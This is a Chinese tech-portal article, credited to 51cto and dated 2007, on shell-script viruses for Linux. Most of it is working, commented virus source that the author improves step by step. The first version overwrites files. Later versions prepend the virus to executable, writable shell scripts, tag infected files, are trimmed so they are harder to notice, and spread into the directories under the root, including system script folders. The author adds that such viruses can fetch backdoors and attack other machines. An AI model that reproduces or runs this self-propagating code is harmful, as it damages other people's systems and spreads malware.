科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道感染Linux系统脚本程序的病毒技术介绍

感染Linux系统脚本程序的病毒技术介绍

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

本文是感染Linux系统脚本程序的病毒技术介绍。

作者:51cto 2007年10月10日

关键字: Linux 脚本 病毒 shell

  • 评论
  • 分享微博
  • 分享邮件

  主要的Shell病毒技术

  当然,本文需要你至少了解Linux Shell编程的基础知识和一星点的病毒知识。OK!我们进入正题!

  我们来看一个最原始的shell病毒,代码最能说明问题:

  #shellvirus I

  for file in *

  do

  cp $0 $file

  done

  

  简单吧?遍历当前文件系统的所有文件,然后覆盖所有文件。但是,我们知道linux是多用户的操作系统,它的文件是具有保护模式的,所以以上的脚本有可能会报出一大堆的错误,所以它很快就会被管理员发现并制止它的传染。所以我们可以为该脚本做个判断,这样隐蔽性就大大增强了:

  #shellvirus II

  for file in *

  do

  if test -f $file

  then

  if test -x $file

  then

  if test -w $file

  then

  if grep -s echo $file >.mmm

  then

  cp $0 $file

  fi; fi; fi; fi; fi

  done

  rm .mmm -f

  

  ok.我们改进了一下,加了若干的判断,判断文件是否存在,是否文件可执行,是否我们有权限写,再判断它是否是脚本程序如果是就cp $0 $file,所以这段代码是感然该系统所有的脚本程序的,危害性还是比较大的。

  if grep -s echo $file>/.mmm

  

  这句也可以这样写:

  if file $file | grep -s 'Bourne shell script' >/dev/nul ;then,也就是判断file是否为shell脚本程序。但是,脚本病毒一旦在感染完毕之后就什么也不做了,它没有象二进制病毒那样的潜伏的危害性,而且以上的脚本只是简单的覆盖宿主而已,所以我这里利用了一下传统的二进制病毒的感染机制,效果也不错:),看看下面代码:

  #infection

  head -n 24 $0 >.test<-取自身保存到.test

  for file in *<-遍历文件系统

  do

  if test -f $file<-判断是否为文件

  then

  if test -x $file<-判断文件是否可执行

  then

  if test -w $file<-判断文件是否可写

  then

  if grep -s echo $file >.mmm<-判断是否为脚本程序

  then

  head -n 1 $file >.mm<-提取要感染的脚本程序的第一行

  if grep -s infection .mm >.mmm<-判断该文件是否已经被感染

  then

  rm -f .mm<-已经被感染,则跳过

  else<-还未被感染

  cat $file >.SAVEE<-很熟悉吧?借用了传统的二进制文件的感染机制

  cat .test >$file

  cat .SAVEE >>$file

  fi; fi; fi; fi; fi

  done

  rm .test .SAVEE .mmm .mm -f

  

  程序的注解足以说明了,其实增加了潜伏的危害性,但还是特容易被发现,没办法的事情,shell脚本一般都是明文的,呵呵。不过危害性已经相当大了.这段程序用了一个感染标志:infection来判断是否已经被感染,着在程序中可以反应出来。

  ok,为了使上面的代码不容易被发现,我必须优化它,最先考虑的肯定是精练代码:

  #infection

  for file in * ;do

  if test -f $file &&test -x $file &&test -w $file ;then

  if grep -s echo $file >/dev/nul ;then

  head -n 1 $file >.mm

  if grep -s infection .mm >/dev/nul ;then

  rm .mm -f ;else

  cat $file >.SAVEE

  head -n 13 $0 >$file

  cat .SAVEE >>$file

  fi; fi; fi

  done

  rm .SAVEE .mm -f

  

  现在只有两个临时文件的产生了,代码也被精简到了13行.当然可以完全用;来把代码甚至写到1-2行,但这里我只是说明问题,就

  不写出来了.

  好,我们看看,shell病毒还能做哪些有用的事情,有可能我们想感染别的目录的文件,比如根目录或者是/etc,/bin等等,因为大多

  数有用的系统配置脚本都存放在那些目录下,只要对上述代码稍作改动就可以实现了:)

  #infection

  xtemp=$pwd<-保存当前路径

  head -n 22 $0 >/.test

  for dir in /* ;do<-遍历/目录

  if test -d $dir ;then<-如果是目录就cd该目录

  cd $dir

  for file in * ;do<-遍历该目录文件

  if test -f $file &&test -x $file &&test -w $file ;then<-确定文件是否可执行,可写

  if grep -s echo $file >/dev/nul ;then<-确定是否为脚本程序

  head -n 1 $file >.mm

  if grep -s infection .mm >/dev/nul ;then<-确定是否已经被感染

  rm .mm -f ;else

  cat $file >/.SAVEE<-和前面的感染机制一样感染未被感染的脚本程序

  cat /.test >$file

  cat /.SAVEE >>$file

  fi; fi; fi

  done

  cd ..

  fi

  done

  cd $xtemp<-返回原目录

  rm /.test /.SAVEE .mm -f

  

  其实这段代码只感染了/目录下的一层目录.当然我们可以使它感染的更深,只是加几个循环而已.同样shell病毒可以做很多事情

  如download后门程序,为机器自动开后门,主动去攻击联网的其他机器,取用户的email来发送传染等等.总之它的实现技术不高深,

  但也比较实用,还是值得去说明一下的,呵呵.

  同样,我们也可以感染elf文件,但危害性很小,这里不重点讲,给个例程大家理解一下吧。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章